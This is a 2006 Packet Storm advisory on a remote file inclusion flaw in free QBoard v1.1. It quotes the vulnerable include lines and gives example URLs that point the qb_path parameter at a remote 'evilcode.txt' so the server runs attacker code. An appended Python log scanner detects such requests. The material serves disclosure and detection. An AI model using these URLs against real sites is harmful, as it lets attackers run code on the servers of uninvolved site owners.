QBoard11.txt

2006-07-09T00:00:00
ID PACKETSTORM:48036
Type packetstorm
Reporter CrAsh_oVeR_rIdE
Modified 2006-07-09T00:00:00

Description

                                        
                                            `free QBoard v1.1 Multiple Remote File include  
-------------------------------------------------  
Discovered By CrAsh_oVeR_rIdE  
Arabian Security Team  
-------------------------------------------------  
Script site: http://sourceforge.net/projects/freeqboard/  
-------------------------------------------------  
Vulnerable: free QBoard v1.1  
-------------------------------------------------  
vulnerable code:  
----------------------  
1- in index.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------------------------------  
2- in about.php  
include $qb_path."incs/header.php";  
----------------------------------  
3- in contact.php  
include $qb_path."incs/header.php";  
----------------------------------  
4- in delete.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------------------------------  
5- in faq.php  
include $qb_path."incs/header.php";  
----------------------------------  
6- in features.php  
include $qb_path."incs/header.php";  
----------------------------------  
7- in history.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------  
File inclusion through the $qb_path parameter  
-------------------------------------------------  
vulnerable files :  
--------------------  
index.php  
about.php  
contact.php  
delete.php  
faq.php  
features.php  
history.php  
-------------------------------------------------  
example:  
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?  
-------------------------------------------------  
Discovered By CrAsh_oVeR_rIdE  
E-mail:KARKOR23@hotmail.com  
Site:www.lezr.com  
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member  
  
`
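Added example, not part of the original advisory or the QBoard project: a log-review helper that flags requests to the seven listed scripts carrying a `qb_path` query parameter. It assumes Apache-style access log lines and that legitimate clients never send `qb_path`; the sample log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists as building include paths from $qb_path.
AFFECTED = {"index.php", "about.php", "contact.php", "delete.php",
            "faq.php", "features.php", "history.php"}
# Request line inside an Apache-style access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme (http:, ftp:, php:, data:, ...).
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)

def classify(log_line):
    """Return (script, qb_path value, reason) for a suspicious request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Assumption: a bare directory request is served by index.php.
    script = url.path.rsplit("/", 1)[-1] or "index.php"
    if script not in AFFECTED:
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("qb_path")
    if values is None:
        return None
    value = values[-1]  # PHP keeps the last of duplicate parameters
    if SCHEME_RE.match(value) or value.startswith("//"):
        reason = "remote-scheme"
    elif ".." in value or value.startswith("/"):
        reason = "local-path"
    else:
        # Assumption: no legitimate client sets qb_path, so any value is reported.
        reason = "client-supplied"
    return script, value, reason

# Constructed sample log lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jul/2006:10:01:02 +0000] "GET /board/index.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [09/Jul/2006:10:02:11 +0000] "GET /board/faq.php?qb_path=http://host.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.9 - - [09/Jul/2006:10:02:15 +0000] "GET /board/about.php?qb_path=http%3A%2F%2Fhost.invalid%2Fx.txt%3F HTTP/1.0" 200 312',
    '198.51.100.9 - - [09/Jul/2006:10:02:20 +0000] "GET /board/delete.php?id=4&qb_path=../../tmp/ HTTP/1.1" 200 99',
    '203.0.113.7 - - [09/Jul/2006:10:03:00 +0000] "GET /board/search.php?qb_path=http://host.invalid/ HTTP/1.1" 404 0',
]

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for script, value, reason in scan(SAMPLE_LOG):
        print(f"{reason:15} {script:13} qb_path={value!r}")
```

Percent-encoded values are decoded before classification, so the encoded and plain forms of the same request produce the same finding.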